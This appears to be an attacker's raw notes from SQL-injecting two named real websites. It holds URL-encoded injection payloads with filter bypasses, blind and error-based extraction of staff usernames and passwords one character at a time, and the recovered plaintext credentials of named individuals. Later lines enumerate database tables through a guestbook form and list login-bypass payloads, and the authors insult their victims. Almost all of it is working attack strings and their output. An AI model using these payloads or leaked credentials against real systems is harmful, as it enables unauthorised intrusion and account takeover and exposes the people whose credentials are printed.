- http://itpark.am/firm.php?lang=us&id=sleep%281%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%206%20not%20in%20%28%279999999999%27%29
- http://itpark.am/firm.php?lang=us&id=-9%20or%20@@version_compile_os%20NOT%20in%20%28%27win32%27%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%273%27%29%20And%20%27aAaAaA%27!=%27A%27
- (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))--
- %01 bypasses
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20table_name%29%29%20AND%208-1=7
- bypass: http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%201%0D%0A%0D%0A%0D%01FROM%0D%0A%0D%0A%0D%0A1%29%29%29%20AND%208-1=7
- BYPASS FROM:
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20NULL,%0D%0D%0D%0D%0D%0dNULL,%0d%0a%20%20%27%TRUE%27%20from%0Ddual%29%29%20AND%208-1=7
- SELECT firms.title_us AS title, firms.address_us AS address, firms.content_us AS description, firms.phone, firms.phone2, firms.fax, firms.email, firms.URL, GROUP_CONCAT(floors.building_code, floors.floor, '', room ORDER BY floors.building_code, floors.floor, CAST(room AS UNSIGNED) SEPARATOR ', №') AS rooms_list, SUM(rooms.area) as total_area FROM firms INNER JOIN rooms ON rooms.firm_id=firms.id INNER JOIN floors ON floors.id = rooms.floor_id WHERE firms.id=-1 or @@version_compile_os NOT in ((select NULL, NULL, '%TRUE' from dual)) AND 8-1=7 GROUP BY firms.id:Operand should contain 1 column(s)
- firms
- rooms
- news
- services
- rent
- staff
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
- error based: http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60user_name%60%29%20%0D%20from%0D%60staff%60%29
- column: password:
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60password%60%29%20%0D%20from%0D%60staff%60%29
- http://itpark.am/firm.php?lang=us&id=-1%20AnD%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
- bypassed!!!
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
- there are 3 users:
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29!=%27%27
- there are 3 jerks here: http://itpark.am/index.php?lang=us&go=staff
- the 3rd user's password:
- ------------------------------------------------------
- 1st character:
- v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- ------------------------------------------------------
- 2nd character: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- ------------------------------------------------------
- 3rd character: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- ------------------------------------------------------
- 4th character: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- ------------------------------------------------------
- 5th character: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- ------------------------------------------------------
- 6th character: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- ------------------------------------------------------
- 7th character: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 8th character: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- looks like the bastard uses a vardanvardan-type pass.
- 9th character: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 10th character: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 11th character: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 12th character: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- --------------------------------------------------------
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,13,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27%27
- vardanvardan
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=0x76617264616E76617264616E
- --------------------------------------------------------
- let's pull the *exact* user name of that jerk vardan:
- --------------------------------------------------------
- 1st character: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 2: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 3: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 4: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 5: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 6: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- --------------------------------------------------------
- 7th character: v
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
- --------------------------------------------------------
- 8: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 9: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
- --------------------------------------------------------
- 10: d
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
- --------------------------------------------------------
- 11: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
- --------------------------------------------------------
- 12: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
- //true
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27vardanvardan%27
- login: vardanvardan
- pass: vardanvardan
- login doesn't work! disabled account?
- =====================================================================
- =====================================================================
- let's pull the login of the user at offset 0:
- 1: g
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27g%27
- =====================================================================
- 2: k
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
- =====================================================================
- 3: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 4: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
- =====================================================================
- 5: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 6: p
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
- =====================================================================
- 7: e
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
- =====================================================================
- 8: t
- =====================================================================
- 9: y
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
- =====================================================================
- 10: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- =====================================================================
- 11: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
- =====================================================================
- 12: empty
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27gkarapetyan%27
- offset 0
- gkarapetyan
- let's pull the pass:
- ============================
- 1: k
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
- ============================
- 2: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 3: r
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
- ============================
- 4: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 5: p
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
- ============================
- 6: e
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
- ============================
- 7: t
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27t%27
- ============================
- 8: y
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
- ============================
- 9: a
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
- ============================
- 10: n
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
- ============================
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x676B61726170657479616E
- hex('gkarapetyan') |
- -----------------------+
- 676B61726170657479616E |
- -----------------------+
- row in set (0.00 sec)
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x6B61726170657479616E
- hex('karapetyan') |
- ----------------------+
- 6B61726170657479616E |
- ----------------------+
- gkarapetyan
- karapetyan
- offset 1
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27s%27
- pass: sergeysergey
- //TRUE
- http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,20%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27sergeysergey%27
- or (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
- http://www.armenian-guides.am/index.php?lang=us&go=guestbook
- 1' and 1 not like 'aaaaaaaaaaaa
- insert into guestbook (comment, URL) values ('\', 'xxxxxxxxxxxxx'):You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '84.32.10.231')' at line 1
- ',version())-- AND 3!=('3
- ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3
- (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- GUESTBOOK
- insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):
- Duplicate entry 'about|5.0.901' for key 1
- limit 2,1
- '84.32.10.231'):Duplicate entry 'armenia|5.0.901' for key 1
- 'be_member|5.0.901' fo
- become
- beforehand
- bylaws
- code
- contacts
- guestbook
- languages
- library
- links
- literature
- member_only
- news
- persons
- survey1
- trainings
- websites
- words
- insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='password' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):Duplicate entry 'persons|5.0.901' for key 1
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="go"\r\n
- \r\n
- guestbook\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="sub"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="act"\r\n
- \r\n
- save\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="lang"\r\n
- \r\n
- us\r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="username"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="password"\r\n
- \r\n
- \r\n
- -----------------------------3691302952036\r\n
- Content-Disposition: form-data; name="comment"\r\n
- \r\n
- ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='username' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3\r\n
- -----------------------------3691302952036--\r\n
- columns in the persons table:
- entry 'PersonID|agg@localhost1' for key 1
- FirstName_am
- FirstName_ru
- FirstName_us
- FirstName_de
- FirstName_fr
- Password
- UserName
- MEMBER ONLY ACCESS
- select * from persons where UserName='\' and Password='':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' and Password=''' at line 1
- select * from persons where UserName=''' and Password=''
- login:\
- pass: or username=(select username from persons limit 1) and password=(select password from persons limit 1)-- and 3='3
- bypass:
- login: ' or 5=5-- and 3='3
- pass: \
- ' or username=(select username from persons limit 1 offset 1)-- and 3='3-- and 3='3